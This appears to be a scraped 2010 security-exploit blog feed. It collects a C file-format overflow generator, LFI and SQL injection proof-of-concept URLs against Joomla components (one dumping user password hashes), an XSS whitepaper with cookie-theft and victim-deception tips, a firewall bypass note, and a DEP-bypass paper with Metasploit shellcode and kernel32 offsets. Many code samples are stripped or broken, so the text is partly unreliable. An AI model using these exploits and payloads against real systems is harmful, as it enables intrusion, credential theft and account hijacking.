0x00, 0x8A, 0x00, 0x00, 0x00, 0x14, 0x00, 0x00, 0x00, 0x1E, 0x00, 0x0E, 0x00, 0x30, 0x03, 0xEE,

0x00, 0x96, 0x00, 0x36, 0x00, 0x30, 0x01, 0x20, 0x10, 0x80, 0x00, 0xFF, 0x00, 0x01, 0x00, 0x01,

0x00, 0x00, 0x00, 0x03, 0x00, 0x97, 0x00, 0x2E, 0x00, 0x87, 0x00, 0xA4, 0x30, 0x00, 0x02, 0x00,

0x00, 0xFF, 0x00, 0xFF, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x00, 0x02, 0x01, 0x36, 0x82, 0x00,

0x00, 0x02, 0x00, 0x02, 0x00, 0x02, 0x00, 0x02, 0x00, 0x02, 0x00, 0x02, 0x00, 0x02, 0x00, 0x02,

0x00, 0x02, 0x00, 0x02, 0x00, 0x02, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00,

0x00, 0x03, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x1E, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x06, 0x00, 0x01, 0x00, 0x00, 0x00, 0x0F, 0xE1, 0xFD, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x43, 0x54,

0x57, 0x56, 0x00, 0x00, 0x00, 0x00, 0x42, 0x4C, 0x57, 0x56, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x4C, 0x54, 0x57, 0x56, 0x00, 0x00, 0x00, 0x00, 0x6E, 0x61, 0x68, 0x43,

0x06, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x6D, 0x75, 0x68, 0x54, 0xC2, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x24, 0x00, 0x00, 0x00, 0x24, 0xDD, 0x00, 0xDD, 0x00, 0xDD, 0x00,

0xDD, 0x00, 0xF5, 0x00, 0xF5, 0xFF, 0xF5, 0x00, 0xF8, 0x00, 0xEF, 0xFF, 0xF8, 0x00, 0xFA, 0x00,

0xEB, 0xFF, 0xFA, 0x00, 0xFB, 0x00, 0xE9, 0xFF, 0xFB, 0x00, 0xFC, 0x00, 0xE7, 0xFF, 0xFC, 0x00,

0xFD, 0x00, 0xE5, 0xFF, 0xFD, 0x00, 0xFE, 0x00, 0xE3, 0xFF, 0xFE, 0x00, 0x01, 0x00, 0x00, 0xE1,

0xFF, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00, 0xE1, 0xFF, 0x01, 0x00, 0x00, 0x00, 0x00, 0xDF, 0xFF,

0x00, 0x00, 0x00, 0x00, 0xDF, 0xFF, 0x00, 0x00, 0x00, 0x00, 0xDF, 0xFF, 0x00, 0x00, 0x00, 0x00,

0xDF, 0xFF, 0x00, 0x00, 0xDE, 0xFF, 0x00, 0x00, 0x00, 0x00, 0xDF, 0xFF, 0x00, 0x00, 0x00, 0x00,

0xDF, 0xFF, 0x00, 0x00, 0x00, 0x00, 0xDF, 0xFF, 0x00, 0x00, 0x00, 0x00, 0xDF, 0xFF, 0x00, 0x00,

0x01, 0x00, 0x00, 0xE1, 0xFF, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00, 0xE1, 0xFF, 0x01, 0x00, 0x00,

0xFE, 0x00, 0xE3, 0xFF, 0xFE, 0x00, 0xFD, 0x00, 0xE5, 0xFF, 0xFD, 0x00, 0xFC, 0x00, 0xE7, 0xFF,

0xFC, 0x00, 0xFB, 0x00, 0xE9, 0xFF, 0xFB, 0x00, 0xFA, 0x00, 0xEB, 0xFF, 0xFA, 0x00, 0xF8, 0x00,

0xEF, 0xFF, 0xF8, 0x00, 0xF5, 0x00, 0xF5, 0xFF, 0xF5, 0x00, 0xDD, 0x00, 0xDD, 0x00, 0xDD, 0x00,

0xDD, 0x00, 0xDD, 0x00 //8756

};

int main(int argc, char *argv[])

{

char buff[409008];

char junk[400001];

memset(junk,0x41,400001);

memcpy(buff,shocks,strlen(shocks));

memcpy(buff+strlen(shocks),junk,strlen(junk));

memcpy(buff+strlen(shocks)+strlen(junk),shocke,strlen(shocke));

fp = fopen(FFORMAT,"wb");

if(fp==NULL)

{

perror ("\nUweeepa! Can't open file.\n");

}

fwrite(buff,1,sizeof(buff),fp);

fclose(fp);

printf("\nFile %s successfully created!\n\a", FFORMAT);

return 0;

}

Bookmark It

Hide Sites

Joomla Custom PHP Pages Component com_php LFI Vulnerability

Georges Kut — Wed, 12 May 2010 18:14:56 +0000

Joomla Custom PHP Pages Component LFI Vulnerability

=====================================================

- Discovered by : Chip D3 Bi0s

- Email : chipdebios@gmail.com

- Date : 2010-05-11

- Where : From Remote

----------------------------------

Affected software description

Application : Joomla Custom PHP Pages Component

Developer : Gabe

Email : gabe@fijiwebdesign.com

Type : Non-Commercial

License : GPL

Date Added : 6 June 2008

Download : http://joomla-php.googlecode.com/files/com_php0.1alpha1-J15.tar.gz

I. BACKGROUND

Joomla PHP Pages Component allows you to create simple PHP pages

and link them to the Joomla Menu. This allows you to easily create

a custom page without having to create a whole component. It is

similar to the PHP Module for Joomla, except that it is a full Component.

II. DESCRIPTION

Some LFI vulnerabilities exist in Joomla Custom PHP Pages Component.

III. ANALYSIS

The bug is in the following files, specifying the lines

/components/com_php/php.php

[35] $filename = $Params->get('file', '');

[36] $path = JPATH_ROOT.'/components/com_php/files/'.$filename;

...

[47] // evaluate the PHP

[48] echo '

';

[49] if (is_file($path)) {

[50] include($path);

[51] } else {

[52] echo 'Please choose a File';

Explaining the above lines:

According to the code that files are opened, but the code is not

shows no filtration, so we can move into

directories. According to several extensions can be observed as

.html, .jpg, .js, which is not true of all .php

IV. EXPLOITATION

http://127.0.0.1/index.php?option=com_php&file=../images/phplogo.jpg

http://127.0.0.1/index.php?option=com_php&file=../js/ie_pngfix.js

http://127.0.0.1/index.php?option=com_php&file=../../../../../../../../../../etc/passwd

+++++++++++++++++++++++++++++++++++++++

[!] Produced in South America

+++++++++++++++++++++++++++++++++++++++

Bookmark It

Hide Sites

Joomla Component XOBBIX [prodid] SQL Injection Vulnerability

Georges Kut — Tue, 06 Apr 2010 19:37:11 +0000

===============================================================================================================

[o] Joomla Component XOBBIX [prodid] SQL Injection Vulnerability

Software : com_xobbix version 1.0.x

Vendor : http://www.php-shop-system.com/

Author : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]

Contact : public[dot]antisecurity[dot]org

Home : http://antisecurity.org/

===============================================================================================================

[o] Exploit

http://localhost/[path]/index.php?option=com_xobbix&catid=32&task=prod_desc&prodid=25

[o] PoC

http://localhost/index.php?option=com_xobbix&catid=31&task=prod_desc&prodid=-21+union+select+1,2,3,4,group_concat(username,0x3a,password),6,7,8,9,10,11,12,13,14,15,16+from+jos_users--

[o] Tool

Simple SQLi Dumper v5.1

http://c0li.info/xpl/ssdp51.tar.gz

http://evilc0de.blogspot.com/2010/03/simple-sqli-dumper-v51-how-to.html

===============================================================================================================

[o] Greetz

Angela Zhang stardustmemory aJe martfella pizzyroot Genex

H312Y yooogy mousekill }^-^{ noname matthews s4va wishnusakti

skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke

Bookmark It

Hide Sites

Denial of Service in McAfee Email Gateway (formerly IronMail)

Georges Kut — Tue, 06 Apr 2010 19:34:58 +0000

Advisory Name: Internal Information Disclosure in McAfee Email Gateway (formerly IronMail)

Vulnerability Class: Information Disclosure

Release Date: Tue Apr 6, 2010

Affected Applications: Secure Mail (Ironmail) ver.6.7.1

Affected Platforms: FreeBSD 6.2 / Apache-Coyote 1.1

Local / Remote: Local

Severity: Low – CVSS: 1.7 (AV:L/AC:L/Au:S/C:P/I:N/A:N)

Researcher: Nahuel Grisolía

Vendor Status: Official Patch Released. Install McAfee Email Gateway 6.7.2 Hotfix 2.

Reference to Vulnerability Disclosure Policy: http://www.cybsec.com/vulnerability_policy.pdf

Vulnerability Description:

Some files that allow to obtain usernames and other internal information can be read by any user inside

the CLI.

Bookmark It

Hide Sites

Advanced XSS Knowledge

Georges Kut — Tue, 06 Apr 2010 18:03:41 +0000

     <|-[___________________________________________________________________________]-|>
       -                                                                             -
       -                          [ Advanced XSS Knowledge ]                         -
       -                             written by novaca!ne                            -
       -                                                                             -
     <|-[___________________________________________________________________________]-|>

# Author: novaca!ne
# Date:   23.03.2010

.°.°.°.°.°.°.°.°.°.°.°.°.°.°.°.°.
Contact: novacaine@no-trace.cc  °
Website: www.novacaine.biz      .
                                °
Artwork by: Vincenzo            .
                                °
Greetz fly out to:              .
                                °
Vincenzo, J0hn.X3r, fred777,    .
h0yt3r, Easy Laster, td0s,      °
Lorenz, Montaxx, maoshe, Palme  .
and free-hack.com               °
.°.°.°.°.°.°.°.°.°.°.°.°.°.°.°.°.

.°.°.°.°.°.°.°.°.°.°.°.°.°.°.°.°.°.°.°.
Index:                                °
--(  I  ]> Introduction               .
                                      °
--( II  ]> What exactly is XSS ?      .
                                      °
--( III ]> How to execute XSS commands.
                                      °
--( IV  ]> Bypass techniques          .
                                      °
--(  V  ]> What can we do with XSS ?  .
                                      °
--( VI  ]> How to fix XSS leakages    .
                                      °
--( VII ]> Cheat Sheets               .
°.°.°.°.°.°.°.°.°.°.°.°.°.°.°.°.°.°.°.°

                            <~-.,~~~~~~~~~~~~~~~~~~~~~~~~~~,.-~>
                                  |--( I   ]> Introduction
                           <~-.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.-~>
$ Dear reader, I wrote this Whitepaper to sum up everything I know about XSS.
$ It was written to share knowledge, knowledge should be free and aviable
$ for everyone.
$ You can post and copy this Whitepaper as much as you want, but respect the
$ author's copyrights.

                        <~-.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.-~>
                              |--( II  ]> What exactly is XSS ?
                       <~-.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.-~>
$ "XSS" is a short form for: "Cross Site Scripting" as you can see by the name , XSS
$ deals with scripting. To be more exact: Javascript (in rare cases you can even
$ inject php code). It's about injecting (almost) every Javascript (and html/css)
$ command/script in a website.
$ XSS flaws comes up everytime a website doesn't filter the attackers input.
$ In other words:
$ the attacker can inject his malicious script into a website, and the browser just
$ run's the code or script.

$ There are 3 types of XSS, I'm going to talk about the 2 most used:
$ Reflected XSS Attack:
$ When a attacker inject his malicious script into a searchquery, a searchbox,
$ or the end of an url, it's called Reflected XSS Attack. It's like throwing a ball
$ against a wall and receive him back.

$ Stored XSS Attack:
$ Is when an injected XSS script is stored permanent on a website, for example in
$ a guestbook or bulletin board. Stored XSS hit's everyone who just reaches the
$ site with the malicious code.

$ DOM based XSS:
$ This is a rare used method, perhaps I'm going to write another Whitepaper about
$ DOM based XSS attack. 

                    <~-.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.-~>
                          |--( III ]> How to execute XSS commads
                   <~-.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.-~>
$ Actually, injecting a XSS script is very easy. To check if the target website is
$ vulnerable,just look out for a searchbox or something.
$ Let's say this is how a simple, unsecured searchfunction looks like:

content of index.html 


 
 Google
 
  

   
   Google: 
   
   
   

 


content of google.php



# I'm going to use this script as an example for the rest of this paper #

$ Let's say this script is stored on a webspace, when I type in:
$ 123
$ then it leads me to the url:

http://site.ru/google.php?search=123

$ and shows me

  123

$ But now, let's try to inject a simple javascript alertmessage :

  

$ and send it.
$ You can replace "turtles" with any other word you want, and even use ' ' instead
$ of " " for example:

  

$ But I'm keep using "turtles" as example for the rest of this paper.
$ The target website let's us know if it's vulnerable when it prints a popup containing

$ |=========|    |======|
$ | turtles | or | 1234 |
$ |=========|    |======|

$ Instead of the called code, we can even inject every simple html tags e.g.:

  I like turtles

$ and send it.
$ Also, you can paste the code at the end of the url, and visit the site like:

  www.site.ru/google.php?search=

$ or

  www.site.ru/google.php?search=I like turtles

# It's like the attacker is determining the content of the website. #

$ But even if this doesn't work, there's no reason to worry: that means the website
$ uses filter techniques to avoid XSS flaws. But there are also ways to
$ bypass those filters. How this works, you're going to read in the next chapter.

                       <~-.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.-~>
                             |--( IV  ]> Bypass techniques
                      <~-.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.-~>
$ There are a lot of ways to bypass XSS filters on websites, I'll number some:

$ 1.) magic_quotes_gpc=ON bypass
$ 2.) HEX encoding
$ 3.) Obfuscation
$ 4.) Trying around

$ 1.) magic_quotes_gpc=ON is a php setting (php.ini).
$     It causes that every ' (single-quote), " (double quote) and  \ (backslash)
$     are escaped with a backslash automatically. It's also a wellknown method
$     to avoid XSS flaws, although it's exploitable.

$ How to bypass it when it's ON? - use the javascript function called
$ String.fromCharCode(), just convert your text in decimal characters
$ (e.g. here: http://www.asciizeichen.de/tabelle.html) and put them in the handling.

$ Using "turtles" (without quote sign) will look like this:

  String.fromCharCode(116, 117, 114, 116, 108, 101, 115)

$ now insert this in your alert script:

  www.site.ru/google.php?search=

$ What happened? - this function converts decimal characters to ascii characters,
$ so the script tells encodet: "turtles" and decodes it in one step,
$ bit complicated, but useful to evade XSS filters.

$  2.) HEX encoding is a useful bypass method, too. Using this step will encode
$      your script, so you can't see what the code will cause.
$      This is how

  

$ looks like encrypted in HEX:

  www.site.ru/google.php?search=%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%2F%74%75%72%74%6C%65%73%2F%29%3B%3C%2F%73%63%72%69%70%74%3E

$ (note: i used "/turtles/" (without quote sign) because just "turtles" didn't work).

$ 3.) Obfuscation - sometimes website administrator simply put words like
$     "script","alert()","''" on the "badwords list", that means, when you
$     search for "script" on the website, it just shows you an error, like
$     "you are not allowed to search for this word" or something.
$     but this is a weak protection, you can bypass it using obfuscation.
$     your javascript code like:

  

$     There are like unlimited possibilities, but that leads us to the
$     next chapter...

$ 4.) Trying around: sometimes you just got to try around, because every website
$     is secured/unsecured in a different, unique way. Some doesn't even use
$     cookies for example. Alway's keep a look at the website's sourcecode!
$     Sometimes you need to adjust your XSS script, like:

  ">

$ This you need sometimes if you injected your code into a searchbox e.g. and
$ interrupt a html tag, so you first need to close him, then start a new
$ tag (

$ or

  www.site.ru/google.php?search=

$ 4.) Cookie stealing: One of the feared things in XSS flaws is the cookie stealing
$     attack. In this method you need to do following:

$     Place this cookiestealer.php in your hoster, and then inject a javascript
$     with your cookiestealer script embedded on your target website.

content of cookiestealer.php (found it somewhere with google)



$ Save it as cookiestealer.php and create a 'log.txt' and upload both files
$ on your own webspace, in the same directory and set "chmod 777".

$ Inject the following code in your target website:

  http://www.site.ru/google.php?search=

$ Then the victim's cookie (target's website user who visited the url above) should
$ appear in the log.txt.
$ Now you simply need to insert the cookie (with e.g. live http headers firefox addon)
$ and use it.

$ Obviously you need to replace

http://www.yourphishingsite.ru

$ With the url of your phishingsite.

# PROTIP: rename your 'cookiestealer.php' to something like 'turtles.php', #
# this looks less suspicous.                                               #

                     <~-.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.-~>
                           |--( VI  ]> How to fix XSS leakages
                   <~-.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.-~>
$ XSS flaws can be very dangerous for your website, even though you can easily
$ secure your own website using the following functions.

##########################################################
#                                                        #
# htmlspecialchars()                                     #
# http://php.net/manual/de/function.htmlspecialchars.php #
#                                                        #
##########################################################

Example usage:

google.php:



$ OR

##########################################################
#                                                        #
# htmlentities()                                         #
# http://php.net/manual/de/function.htmlentities.php     #
#                                                        #
##########################################################

Example usage:

google.php:



$ What happened? - the function simply replaced every specialchar to a harmless html char.
$ For example when I enter



$ it appears



$ But without any popup, because the <,>,',"
$ turned into <,>,',"
$ The attackers input has become a harmless, unexecutable html code.

                        <~-.,~~~~~~~~~~~~~~~~~~~~~~~~~~,.-~>
                              |--( VII ]> Cheat Sheets
                       <~-.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.-~>
$ Here is the XSS cheat sheet, where I got most of them from http://ha.ckers.org/xss.html.
$ Enjoy.

'';!--"=&{()}











">















#############################################################
#                                                           #
# PROTIP FOR EVERY XSS INJECTION:                           #
# use url shortener services such as tinyurl.com or bit.ly  #
# to 'hide' your injection, so the victim won't know what's #
# behind that url.                                          #
#                                                           #
#############################################################

END OF FILE

Hol dir das Gratis-Geschenkpaket von Windows 7 für deinen PC ab!

Bookmark It

Hide Sites

Bypassing Firewalls using an FTP

Georges Kut — Tue, 06 Apr 2010 18:02:30 +0000

# [+]Title: [Bypassing Firewalls using an FTP]
###################################################
# [+] About :
###################################################
# Author : GlaDiaT0R | the_gl4di4t0r[AT]hotmail.com
# Team : DarkGh0st Team | Tunisian Power Team ( DarkGh0st.Com )
# Greetz: Boomrang_Victim, Marwen_Neo & all my friends in Security Challenge days 2010
As you probably know, a firewall is nothing more than a prebuilt set of rules that determines what happens on a network, or what did not happen there. However, if the firewall is poorly implemented or buggy, the override will be a breeze because the filtering rules normally could become important therefore totally useless.

Set a source port for its connections is one of many methods used to bypass a firewall. In fact, the Firewall check mainly the IP addresses and source ports and destination ports for each packet sent across the network, which allows to write rules far more easily. There are two categories of firewall, Stateless and Stateful. The Stateful Firewall, the opposite of Stateless memorize the state of connections (Connection Request, Connection established ...).

However, certain applications or protocols such as FTP are a real problem for packet filtering. FTP indeed indicates that the server sends data from its port 20, to a client port. Therefore, if an administrator wants to allow the opportunity for guests to use its network for FTP clients, it will probably have to allow any packets whose source port is 20.

The attack is to discover the services normally hidden by performing a port scanning by configuring its packets whose source port is 20. Nmap offers this opportunity through the command option '-g'.

The challenges thereafter, once found an accessible, will ensure that all connections come from source port, providing access to the machine. In our case, this will be port 20 (Port link up for FTP). For this, different tools are already on the net.

These include, for example, AMP Fund, which is a tool for port forwarding. Indeed, by establishing a "AMP Fund-v-l 8080-s 20-r 80 , we bypass the firewall of the remote system, provided that the source port 20 is not filtered. There are also KevProxy, or a simple "kp 8080 80 20 v" can establish a tunnel to port 80 of the target machine.

Thank you for reading ! =)

Bookmark It

Hide Sites

Exploitation With WriteProcessMemory

Georges Kut — Tue, 06 Apr 2010 18:00:26 +0000

 !--------------------------------------------------------------------------!
  !-----------=|     Exploitation With WriteProcessMemory()     |=-----------!
  !-----------=|              Yet Another DEP Trick             |=-----------!
  !-----------=|                       ----                     |=-----------!
  !-----------=|            Written By Spencer Pratt            |=-----------!
  !-----------=|            spencer.w.pratt () gmail com           |=-----------!
  !--------------------------------------------------------------------------!
  !--=[ dd6c2309cab71bdb3aabce69cacb6f5f6c0e2d60bd51d6f629904553a8dc0a7c ]=--!
  !--=[ 5db5cef0f8e0a630d986b91815336bc9a81ebe5dbd03f1edaddde77e58eb2dba ]=--!
  !--------------------------------------------------------------------------!

                ----=!#[     Table of Contents     ]#!=----
                ---                                     ---
                --  I.       Introduction                --
                --  II.      Background Information      --
                --  III.     WriteProcessMemory()        --
                --  VI.      Slightly Clever             --
                --  VII.     Return Chaining             --
                --  VIII.    Conclusions                 --
                --  IX.      Special Thanks, Greets      --
                ---                                     ---
                ------------------------------------------- 

  ----------------------=![      Introduction      ]!=------------------------

  This paper introduces yet another function to defeat Windows DEP. It is
  assumed that the reader is already familiar with buffer overflows on x86,
  and has a basic understanding of the DEP protection mechanism. The technique
  discussed in this paper is aimed at Windows XP, however, it should also work
  on other Windows versions given that the attacker has some way to find the
  address of the DLL, such as through a memory disclosure, etc. This paper
  does not address the issue of ASLR, rather it recognizes ASLR as a
  completely separate problem. The method described here is not conceptually
  groundbreaking, and is ultimately only as impressive as any other ret-2-lib
  technique.  

  -----------------=! [      Background Information      ] !=-----------------

  The introduction of DEP and other mechanisms has slightly raised the bar for
  exploitation on Windows. Variations on the ret-2-lib technique have been
  used in order to circumvent DEP. Some popular functions are:

    - WinExec() to execute a command: still useful but not as desirable as
      having arbitrary shellcode execution.

    - VirtualProtect() to make memory executable: still useful, but often
      requires ROP.

    - VirtualAlloc() to allocate new executable memory: still useful but
      often requires ROP.

    - SetProcessDEPPolicy() to disable DEP: doesn't work if DEP is AlwaysOn,
      and may only be called once per process.

    - NtSetProcessInformation() to disable DEP: this function fails if
      AlwaysOn or MEM_EXECUTE_OPTION_PERMANENT flag is set.

  ------------------=! [      WriteProcessMemory()      ] !=------------------

  If you can't go to the mountain, bring the mountain to you.

  The function WriteProcessMemory() is typically used for debugging, and as
  defined by MSDN it:

     "Writes data to an area of memory in a specified process. The entire
     area to be written must be accessible or the operation fails."

  The function takes the following arguments:

  WriteProcessMemory(HANDLE hProcess, LPVOID lpBaseAddress, LPCVOID lpBuffer,
           SIZE_T nSize, SIZE_T *lpNumberBytesWritten);

  The idea here is simple: if it is not possible execute the writable memory,
  write to the executable memory instead. By returning to WriteProcessMemory()
  it is possible to write arbitrary code into a running thread, effectively
  hot-patching it with shellcode. This works because WriteProcessMemory()
  performs the required privilege changes using NtProtectVirtualMemory() to
  allow the memory to be written to, regardless of being marked as executable.

  --------------------=! [      Slightly Clever      ] !=---------------------

  The caveats of WriteProcessMemory() introduce a couple of problems to solve
  before the function is eligible for exploitation. First, finding a suitable
  location to patch can be a difficult task. Second, the final argument needs
  to be NULL or a pointer to memory where the lpNumberBytesWritten is stored.
  As luck would have it, there is an easy solution to handle both issues: use
  the WriteProcessMemory() function to write to itself. 

  Using WriteProcessMemory() to patch itself removes the requirement of
  finding a location in a thread to patch, as the destination address is now
  offset from the known address of WriteProcessMemory(). It also removes the
  need for a second jmp/call to the patched location, as the natural flow of
  execution will walk directly into the patched code. Finally, by carefully
  picking the offset into WriteProcessMemory() to patch, it eliminates the
  need for the last pointer argument (or NULL), by overwriting the code that
  performs the pointer check and then stores the lpNumberBytesWritten.

  Finding a suitable location to write code to inside WriteProcessMemory() is
  easy. Observe the function code snip below:

    WindowsXP kernel32.dll, WriteProcessMemory 0x7C802213+...
      ...
      7C8022BD:  lea     eax, [ebp + hProcess]
      7C8022C0:  push    eax
      7C8022C1:  push    ebx
      7C8022C2:  push    [ebp + lpBuffer]
      7C8022C5:  push    [ebp + lpBaseAddress]
      7C8022C8:  push    edi
      7C8022C9:  call    NtWriteVirtualMemory
      7C8022CF:  mov     [ebp + lpBuffer], eax
      7C8022D2:  mov     eax, [ebp + lpNumberBytesWritten]
      7C8022D5:  test    eax, eax
      7C8022D7:  jz      short 7C8022DE
      ...

  The last operation that needs to complete in order to successfully patch
  the process is the call to NtWriteVirtualMemory() at 0x7C8022C9. The setup
  for storing lpNumberBytesWritten starts afterwards, and so 0x7C8022CF is
  the ideal destination address to begin overwriting. Immediately after the
  write is completed the function flows directly into the freshly written
  code. This allows the bypass of permanent DEP in one call.

  The arguments to do this look like this:

  WriteProcessMemory(-1, 0x7C8022CF, ShellcodeAddr, ShellcodeLen, ..Arbitrary)

  The first argument, -1 for hProcess HANDLE, specifies the current process.
  The second argument is the offset into WriteProcessMemory() where shellcode
  will be written. The third argument, ShellcodeAddr, needs to be the address
  of shellcode stored somewhere in memory; this could be code that has been
  sprayed onto the heap, or at a location disclosed by the application. The
  fourth argument is the length of shellcode to copy. The last argument is no
  longer relevant as the code that deals with it is being overwritten by the
  copy itself. 

  For a textbook example stack overflow this payload layout looks like:

  [0x7C802213] [AAAA] [0xffffffff] [0x7C8022CF] [&shellcode] [length]
  ^            ^      ^            ^            ^            ^
  '            '      '            '            '            '
  '            '      '            '            '            shellcode length
  '            '      '            '            '
  '            '      '            '            shellcode address
  '            '      '            '
  '            '      '            dest address in WriteProcessMemory()
  '            '      '
  '            '      hProcess HANDLE (-1)
  '            '
  '            next return address (irrelevant)
  '
  WriteProcessMemory() address, overwritten EIP

  --------------------=! [      Return Chaining      ] !=---------------------

  The technique as described is still imperfect: it requires knowing where
  shellcode is in memory. Ideally, the location of the WriteProcessMemory()
  function (kernel32.dll) should be all that is required to successfully land
  arbitrary code execution. Consider a scenario where control of the stack is
  gained, but the location of the stack or orther data (other than the address
  of WriteProcessMemory) is unknown. By chaining multiple calls together to
  copy from offsets of known data, WriteProcessMemory() can be used to build
  shellcode dynamically from already existing code.

  In order to perform this, the following steps need to be taken:

    1. Locate offsets for the op codes and data to compose the shellcode with.

    2. Identify a location with enough space to patch, which does not conflict
       with any of the locations being copied from.

    3. Perform multiple returns to WriteProcessMemory(), patching the location
       with shellcode chunks from offsets.

    4. Return to newly patched shellcode.

  Step 1 of this process allows for some space optimization. Searching for
  and finding multibyte sequences of the desired shellcode (rather than just
  single bytes) allows for fewer returns to WriteProcessMemory(), and thus
  less required space for the chained stack arguments.

  Consider generic win32 calc.exe shellcode from Metasploit as an example:

  \xfc\xe8\x44\x00\x00\x00\x8b\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18
  \x8b\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74
  \x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x04\x75\xe5\x8b\x5f\x24\x01
  \xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x8b\x1c\x8b\x01\xeb\x89\x5c\x24
  \x04\xc3\x5f\x31\xf6\x60\x56\x64\x8b\x46\x30\x8b\x40\x0c\x8b\x70\x1c\xad
  \x8b\x68\x08\x89\xf8\x83\xc0\x6a\x50\x68\x7e\xd8\xe2\x73\x68\x98\xfe\x8a
  \x0e\x57\xff\xe7\x63\x61\x6c\x63\x2e\x65\x78\x65\x00

  By breaking this shellcode down into every possible unique chunk of 2 bytes
  or more, and then searching for it in kernel32.dll, it is easy to find the
  pieces to dynamically construct this code. Of course, not all of this code
  will be available in multibyte sequences. In turn some of the pieces will
  need to be copied in as single bytes. Here is the output from an automated
  scan for these sequences, code to build this table is provided later on:

     ________________________________________________________
    |----    Bytes    ----------   PE/DLL   ---    WPM()  ---|
    |--------------------------------------------------------|
    |  shellcode[000-001]        0x7c8016d9 -->  0x7c861967  |
    |  shellcode[001-006]        0x7c81b11c -->  0x7c861968  |
    |  shellcode[006-010]        0x7c8285e3 -->  0x7c86196d  |
    |  shellcode[010-012]        0x7c801e3c -->  0x7c861971  |
    |  shellcode[012-014]        0x7c804714 -->  0x7c861973  |
    |  shellcode[014-015]        0x7c801aa6 -->  0x7c861975  |
    |  shellcode[015-018]        0x7c87acf4 -->  0x7c861976  |
    |  shellcode[018-020]        0x7c80a2b1 -->  0x7c861979  |
    |  shellcode[020-022]        0x7c804664 -->  0x7c86197b  |
    |  shellcode[022-025]        0x7c84266b -->  0x7c86197d  |
    |  shellcode[025-026]        0x7c801737 -->  0x7c861980  |
    |  shellcode[026-028]        0x7c80473a -->  0x7c861981  |
    |  shellcode[028-030]        0x7c81315c -->  0x7c861983  |
    |  shellcode[030-032]        0x7c802b44 -->  0x7c861985  |
    |  shellcode[032-034]        0x7c81a061 -->  0x7c861987  |
    |  shellcode[034-037]        0x7c812ae7 -->  0x7c861989  |
    |  shellcode[037-038]        0x7c801639 -->  0x7c86198c  |
    |  shellcode[038-040]        0x7c841d31 -->  0x7c86198d  |
    |  shellcode[040-042]        0x7c8047a7 -->  0x7c86198f  |
    |  shellcode[042-044]        0x7c8121da -->  0x7c861991  |
    |  shellcode[044-047]        0x7c80988f -->  0x7c861993  |
    |  shellcode[047-048]        0x7c8016dc -->  0x7c861996  |
    |  shellcode[048-051]        0x7c84a0d0 -->  0x7c861997  |
    |  shellcode[051-052]        0x7c801a8a -->  0x7c86199a  |
    |  shellcode[052-054]        0x7c802e41 -->  0x7c86199b  |
    |  shellcode[054-055]        0x7c8016fb -->  0x7c86199d  |
    |  shellcode[055-059]        0x7c84bb29 -->  0x7c86199e  |
    |  shellcode[059-062]        0x7c80a2b1 -->  0x7c8619a2  |
    |  shellcode[062-063]        0x7c801677 -->  0x7c8619a5  |
    |  shellcode[063-065]        0x7c8210f4 -->  0x7c8619a6  |
    |  shellcode[065-067]        0x7c801e9a -->  0x7c8619a8  |
    |  shellcode[067-068]        0x7c801677 -->  0x7c8619aa  |
    |  shellcode[068-070]        0x7c821d86 -->  0x7c8619ab  |
    |  shellcode[070-071]        0x7c8019ba -->  0x7c8619ad  |
    |  shellcode[071-072]        0x7c801649 -->  0x7c8619ae  |
    |  shellcode[072-073]        0x7c8016dc -->  0x7c8619af  |
    |  shellcode[073-075]        0x7c832d0b -->  0x7c8619b0  |
    |  shellcode[075-076]        0x7c8023e4 -->  0x7c8619b2  |
    |  shellcode[076-078]        0x7c86a706 -->  0x7c8619b3  |
    |  shellcode[078-080]        0x7c80e11b -->  0x7c8619b5  |
    |  shellcode[080-083]        0x7c8325a2 -->  0x7c8619b7  |
    |  shellcode[083-087]        0x7c840db2 -->  0x7c8619ba  |
    |  shellcode[087-089]        0x7c812ff8 -->  0x7c8619be  |
    |  shellcode[089-091]        0x7c82be3c -->  0x7c8619c0  |
    |  shellcode[091-093]        0x7c802552 -->  0x7c8619c2  |
    |  shellcode[093-094]        0x7c80168e -->  0x7c8619c4  |
    |  shellcode[094-097]        0x7c81cd28 -->  0x7c8619c5  |
    |  shellcode[097-100]        0x7c812cc3 -->  0x7c8619c8  |
    |  shellcode[100-101]        0x7c80270d -->  0x7c8619cb  |
    |  shellcode[101-102]        0x7c80166b -->  0x7c8619cc  |
    |  shellcode[102-103]        0x7c801b17 -->  0x7c8619cd  |
